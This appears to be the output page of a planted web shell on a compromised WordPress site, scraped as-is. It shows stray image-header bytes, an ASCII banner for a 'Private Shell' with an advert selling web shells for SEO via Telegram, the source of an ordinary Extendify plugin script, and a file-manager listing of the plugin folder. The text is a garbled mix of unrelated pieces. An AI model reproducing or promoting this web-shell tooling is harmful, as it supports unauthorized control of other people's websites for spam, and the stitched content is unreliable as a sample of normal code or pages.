����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { AssistLandingPage } from '@assist/AssistLandingPage';
import { createRoot, render as renderDeprecated } from '@wordpress/element';
import { __ } from '@wordpress/i18n';
import '@assist/assist.css';
const render = (component, node) => {
if (typeof createRoot !== 'function') {
renderDeprecated(component, node);
return;
}
createRoot(node).render(component);
};
const init = () => {
const assistPage = document.getElementById('extendify-assist-landing-page');
if (!assistPage) return;
// append skip link to get here
document
.querySelector('.screen-reader-shortcut')
.insertAdjacentHTML(
'afterend',
`<a href="#extendify-assist-landing-page" class="screen-reader-shortcut">${__(
'Skip to Assist',
'extendify-local',
)}</a>`,
);
render(<AssistLandingPage />, assistPage);
};
init();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| components | Folder | 0755 |
|
|
| hooks | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| pages | Folder | 0755 |
|
|
| state | Folder | 0755 |
|
|
| svg | Folder | 0755 |
|
|
| tasks | Folder | 0755 |
|
|
| util | Folder | 0755 |
|
|
| AssistLandingPage.jsx | File | 347 B | 0644 |
|
| assist.css | File | 1.22 KB | 0644 |
|
| documentation.css | File | 2.11 KB | 0644 |
|
| page.js | File | 827 B | 0644 |
|